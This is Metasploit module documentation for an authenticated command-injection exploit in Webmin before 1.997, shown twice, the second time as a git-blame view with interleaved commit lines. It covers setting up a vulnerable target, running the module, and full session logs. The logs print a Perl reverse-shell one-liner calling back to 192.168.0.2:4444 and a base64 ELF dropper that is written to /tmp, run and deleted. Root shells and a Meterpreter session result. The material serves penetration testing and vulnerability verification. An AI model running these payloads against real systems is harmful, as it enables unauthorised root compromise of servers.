documentation/modules/exploit/linux/http/webmin_package_updates_rce.md

## Vulnerable Application

This module exploits an arbitrary command injection in Webmin versions prior to
1.997.

Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package
updates and installation. Due to a lack of input sanitization, it is possible to
inject an arbitrary command that will be concatenated to the package manager call.

This exploit requires authentication and the account must have access to the
Software Package Updates module.

## Installation

### Ubuntu
- Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb
- Install it along with its dependencies (`libio-pty-perl` required when installing on Ubuntu 20.04)
```
apt-get install libauthen-pam-perl libio-pty-perl
dpkg -i ./webmin_1.996_all.deb
```

## Setup
- Go to `https://<target IP>:10000/`
- Login as `root` with the OS password
- Create a new user:
  `Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create`
- Setup permissions
  `Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save`

## Verification Steps
1. Install and setup the application
1. Start msfconsole
1. Do: `use exploit/linux/http/webmin_package_updates_rce`
1. Do: `run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password>`
1. You should get a shell.

## Options

### TARGETURI

Set this to the Webmin base path. The default is `/`.

### USERNAME

The account username to use.

### PASSWORD

The account password.

## Scenarios

### Webmin 1.996 on Ubuntu 18.04
- Target 0 (`Unix In-Memory`)
```
msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456

[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Webmin 1.996 detected
[+] Webmin 1.996 is a supported target
[+] The target appears to be vulnerable.
[*] Attempting login
[+] Logged in!
[*] Sending payload
[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200

id
uid=0(root) gid=0(root) groups=0(root)

cat /etc/issue
Ubuntu 18.04.6 LTS \n \l
```

- Target 1 (`Linux Dropper`)
```
msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Webmin 1.996 detected
[+] Webmin 1.996 is a supported target
[+] The target appears to be vulnerable.
[*] Attempting login
[+] Logged in!
[*] Sending payload
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 192.168.0.23
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.0.23
OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```
Add module exploit and docs for the Webmin package updates RCE 2022-08-03 12:01:41 +02:00			`## Vulnerable Application`

			`This module exploits an arbitrary command injection in Webmin versions prior to`
			`1.997.`

			Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package
Fix from code review 2022-08-09 15:09:25 +02:00			`updates and installation. Due to a lack of input sanitization, it is possible to`
			`inject an arbitrary command that will be concatenated to the package manager call.`
Add module exploit and docs for the Webmin package updates RCE 2022-08-03 12:01:41 +02:00
			`This exploit requires authentication and the account must have access to the`
			`Software Package Updates module.`

Fix from code review 2022-08-09 15:09:25 +02:00			`## Installation`
Add module exploit and docs for the Webmin package updates RCE 2022-08-03 12:01:41 +02:00
			`### Ubuntu`
			`- Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb`
Fix from code review 2022-08-09 15:09:25 +02:00			- Install it along with its dependencies (`libio-pty-perl` required when installing on Ubuntu 20.04)
Add module exploit and docs for the Webmin package updates RCE 2022-08-03 12:01:41 +02:00			```
Fix from code review 2022-08-09 15:09:25 +02:00			`apt-get install libauthen-pam-perl libio-pty-perl`
Add module exploit and docs for the Webmin package updates RCE 2022-08-03 12:01:41 +02:00			`dpkg -i ./webmin_1.996_all.deb`
			```

			`## Setup`
			- Go to `https://<target IP>:10000/`
			- Login as `root` with the OS password
			`- Create a new user:`
			`Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create`
			`- Setup permissions`
			`Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save`

			`## Verification Steps`
			`1. Install and setup the application`
			`1. Start msfconsole`
			1. Do: `use exploit/linux/http/webmin_package_updates_rce`
			1. Do: `run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password>`
			`1. You should get a shell.`

			`## Options`

			`### TARGETURI`

			Set this to the Webmin base path. The default is `/`.

			`### USERNAME`

			`The account username to use.`

			`### PASSWORD`

			`The account password.`

			`## Scenarios`

			`### Webmin 1.996 on Ubuntu 18.04`
			- Target 0 (`Unix In-Memory`)
			```
			`msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456`

			`[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.)/){system $1;}};'`
			`[*] Started reverse TCP handler on 192.168.0.2:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[*] Webmin 1.996 detected`
			`[+] Webmin 1.996 is a supported target`
			`[+] The target appears to be vulnerable.`
			`[*] Attempting login`
			`[+] Logged in!`
			`[*] Sending payload`
			`[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200`

			`id`
			`uid=0(root) gid=0(root) groups=0(root)`

			`cat /etc/issue`
			`Ubuntu 18.04.6 LTS \n \l`
			```

			- Target 1 (`Linux Dropper`)
			```
			`msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456`

			`[*] Started reverse TCP handler on 192.168.0.2:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[*] Webmin 1.996 detected`
			`[+] Webmin 1.996 is a supported target`
			`[+] The target appears to be vulnerable.`
			`[*] Attempting login`
			`[+] Logged in!`
			`[*] Sending payload`
			[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) \|\| (which base64 >&2 && base64 --decode -) \|\| (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) \|\| (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') \|\| (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3020772 bytes) to 192.168.0.23`
			`[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200`
			`[*] Command Stager progress - 100.00% done (823/823 bytes)`

			`meterpreter > getuid`
			`Server username: root`
			`meterpreter > sysinfo`
			`Computer : 192.168.0.23`
			`OS : Ubuntu 18.04 (Linux 5.4.0-122-generic)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			```